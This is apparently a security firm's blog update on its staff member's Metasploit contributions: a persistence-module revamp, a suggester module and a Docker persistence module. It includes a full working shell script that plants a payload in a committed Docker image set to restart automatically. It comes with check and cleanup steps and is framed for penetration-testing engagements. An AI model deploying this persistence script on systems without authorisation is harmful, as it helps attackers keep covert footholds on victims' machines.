METASPLOIT PROJECT

The Metasploit Project, owned by Rapid7, is the world’s most widely used penetration testing framework. The Metasploit Framework is Free and Open Source Software (FOSS), used by the vast majority of penetration testers, and is a staple of training courses from SANS, EC-Council, and many others.
The Metasploit Project, being Open Source Software, flourishes from the contributions of the community. nDepth’s own Mike Cyr (h00die) is a frequent contributor to the project and has continued to spend their personal time conducting security research and providing enhancements to Metasploit for the benefit of the security community. This month, h00die contributed the following enhancements:
PERSISTENCE REVAMP
About a year ago, bcoles, one of the Metasploit developers with commit rights, suggested revamping how Metasploit handles persistence. Persistence modules sometimes gave you back a shell and sometimes didn’t. There was rarely documentation or code for cleaning up the persistence technique afterwards. Some modules wouldn’t even start the shell handler for you. Some modules had “persistence” in the file name, but others didn’t, and many lacked documentation. This was definitely an overlooked and underutilized area of Metasploit. Most of these modules also used techniques catalogued in the MITRE ATT&CK framework but never referenced it (most were written before it existed).
Teaming up with Rapid7’s Diego Ledda, an initial code change was proposed in January. This code added a lot of new functionality, including starting handlers automatically, setting appropriate timeout values, introducing a cleanup mechanism, and updating many modules to use the new functionality. However, the change was too large for a single Rapid7 reviewer to take on (74 files changed, 5,571 lines added, 3,320 lines removed).
After some discussion between Rapid7’s Diego Ledda and Martin Sutovsky and nDepth Security’s h00die, a new strategy was agreed upon: keep the previously written code, but break it into smaller pieces for easier review. Starting in August, changes began to appear in the framework to establish the new persistence. First, Diego’s mixin (library) was added, creating the underlying functionality required by the new modules. After that, an avalanche of module updates were submitted to standardize each persistence module. The updates to each module included:
- Testing to ensure the module worked as intended
- Documentation to outline how to use the module properly
- Moving the module under a /persistence/ folder for easier identification
- Testing with additional payloads and architectures
- Adding MITRE ATT&CK framework references
- Adding Notes to denote expected behaviors
- Creating check methods allowing users to determine whether a module will work against a specific target
- Creating cleanup scripts allowing users to uninstall the persistence
- Separating larger more complex modules into their base techniques allowing for ease of use
Additionally, two more features were added or should be added soon. The first, and arguably the more boring, is documentation on how to properly write a persistence module and use the new features. The second feature is covered in the next section!
NEW MODULE: PERSISTENCE SUGGESTER
This feature should be added to Metasploit in the very near future! With the new persistence mechanisms, it can be hard to know which will work on a specific target given its operating system and the level of access you have. The new persistence suggester gathers all of the persistence modules, filters them to those that apply to the target’s OS family, then runs each module’s check method to find which ones self-report that they can be used. This is very similar to the existing local_exploit_suggester module. After running this new module, it’ll be clear which modules should succeed and which likely won’t.
NEW MODULE: PERSISTENT DOCKER IMAGE
While revamping the other persistence modules, h00die thought it would be fun to create a new module that takes advantage of systems with Docker installed. Docker packages an application and its dependencies into a container, an isolated environment that runs the same way on any host. With this new persistence technique, if a computer is running Docker and the compromised user has permission to use it, a lightweight Alpine Linux image is downloaded. A payload is placed into a container based on that image, along with a script that automatically restarts the payload if it crashes. The container is then saved as an image and started on the machine. If the container is stopped by a system reboot or for any other reason, Docker automatically restarts it, re-establishing the persistence.
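As an added illustration of the technique described above (and of the check-method and cleanup pattern from the revamp list), here is a hand-rolled shell version of the Docker persistence flow. This is not the Metasploit module’s own code: the image tag, container name, in-container path (/opt/agent), payload path, and the use of docker commit for the “saved” step are all assumptions, and the real module may do things differently.

```shell
#!/bin/sh
# Added example, not the Metasploit module's code. Assumptions:
#   - PAYLOAD_PATH is a Linux ELF payload already staged on the host
#   - IMAGE, NAME and /opt/agent are arbitrary (hypothetical) choices
#   - `docker commit` implements the "save the container" step
IMAGE="${IMAGE:-alpine:3.20}"
NAME="${NAME:-svc-health}"                 # hypothetical, chosen to look mundane
PAYLOAD_PATH="${PAYLOAD_PATH:-/tmp/payload.elf}"

# Check step: can the current user actually drive the Docker daemon?
# `docker info` fails when the socket is not accessible (not root / not in docker group).
docker_check() {
    command -v docker >/dev/null 2>&1 || { echo "docker client not found"; return 1; }
    docker info >/dev/null 2>&1 || { echo "cannot reach the Docker daemon"; return 1; }
    echo "docker is usable by $(id -un)"
}

# Sanity check on the payload: ELF magic is 0x7f 'E' 'L' 'F'.
# Alpine ships musl, so the payload must be static or at least not expect glibc.
is_elf() {
    [ "$(head -c 4 "$1" 2>/dev/null | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

# Supervisor loop baked into the container: re-launch the payload if it exits.
supervisor_script() {
    cat <<'EOF'
#!/bin/sh
while true; do
    /opt/agent/payload
    sleep 10
done
EOF
}

install_persistence() {
    is_elf "$PAYLOAD_PATH" || { echo "$PAYLOAD_PATH is not an ELF binary"; return 1; }
    docker pull -q "$IMAGE" >/dev/null
    tmp=$(mktemp -d)
    cp "$PAYLOAD_PATH" "$tmp/payload"
    supervisor_script > "$tmp/run.sh"
    chmod 755 "$tmp/payload" "$tmp/run.sh"
    # Stage a throwaway container, copy the files in, and commit it as a new image
    # whose entrypoint is the supervisor loop (docker cp creates /opt/agent).
    cid=$(docker create "$IMAGE" /bin/true)
    docker cp "$tmp/." "$cid:/opt/agent"
    docker commit --change 'ENTRYPOINT ["/opt/agent/run.sh"]' --change 'CMD []' \
        "$cid" "$NAME:latest" >/dev/null
    docker rm "$cid" >/dev/null
    rm -rf "$tmp"
    # --restart always: dockerd restarts the container after a crash and after a
    # reboot, provided the Docker service itself is enabled at boot.
    docker run -d --restart always --name "$NAME" "$NAME:latest"
}

# Cleanup step: remove both the running container and the committed image.
cleanup_persistence() {
    docker rm -f "$NAME" >/dev/null 2>&1 || true
    docker rmi "$NAME:latest" >/dev/null 2>&1 || true
    echo "removed container and image $NAME"
}

case "${1:-}" in
    check)   docker_check ;;
    install) docker_check && install_persistence ;;
    cleanup) cleanup_persistence ;;
esac
```

Run it as `sh docker_persist.sh check`, `install` or `cleanup`. Two caveats worth knowing before relying on this on an engagement: the restart-after-reboot behaviour comes entirely from the Docker daemon's restart policy, so it only holds if dockerd is enabled at boot, and the committed image is plainly visible in `docker images` and `docker ps`, which is exactly what a defender should be looking at.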
To view this month’s contributions, check the following links:
- https://github.com/rapid7/metasploit-framework/issues/19592
- https://github.com/rapid7/metasploit-framework/issues/20374
- https://github.com/rapid7/metasploit-framework/pull/19815
- https://github.com/rapid7/metasploit-framework/pull/20381
- https://github.com/rapid7/metasploit-framework/pull/20495
- https://github.com/rapid7/metasploit-framework/pull/20494
- https://github.com/rapid7/metasploit-framework/pull/20497
- https://github.com/rapid7/metasploit-framework/pull/20504
- https://github.com/rapid7/metasploit-framework/pull/20508
- https://github.com/rapid7/metasploit-framework/pull/20509
- https://github.com/rapid7/metasploit-framework/pull/20510
- https://github.com/rapid7/metasploit-framework/pull/20520
- https://github.com/rapid7/metasploit-framework/pull/20521
- https://github.com/rapid7/metasploit-framework/pull/20522
- https://github.com/rapid7/metasploit-framework/pull/20523
- https://github.com/rapid7/metasploit-framework/pull/20524
- https://github.com/rapid7/metasploit-framework/pull/20525
- https://github.com/rapid7/metasploit-framework/pull/20526
- https://github.com/rapid7/metasploit-framework/pull/20527
- https://github.com/rapid7/metasploit-framework/pull/20564
- https://github.com/rapid7/metasploit-framework/pull/20565
- https://github.com/rapid7/metasploit-framework/pull/20536

